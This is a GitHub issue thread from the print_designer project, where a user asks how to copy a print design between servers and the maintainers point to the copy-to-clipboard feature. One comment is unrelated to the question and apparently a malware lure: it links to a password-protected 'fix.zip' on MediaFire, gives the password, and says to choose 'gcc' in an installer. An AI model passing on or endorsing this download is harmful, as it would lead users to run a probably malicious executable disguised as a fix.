### ISSUE TITLE
Copy to another server

### ISSUE THREAD

**Issue by classita2661** [frappe/print_designer#347]
Hi there,

How to copy my design from a server to another server?

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by classita2661** [comment]
sorry, may i know what is it?

**Comment by samy4sam** [comment]
Copy to the clipboard and paste on the other server

**Comment by maharshivpatel** [comment]
@classita2661 as @samy4sam suggested use copy to clipboard feature. Thank you
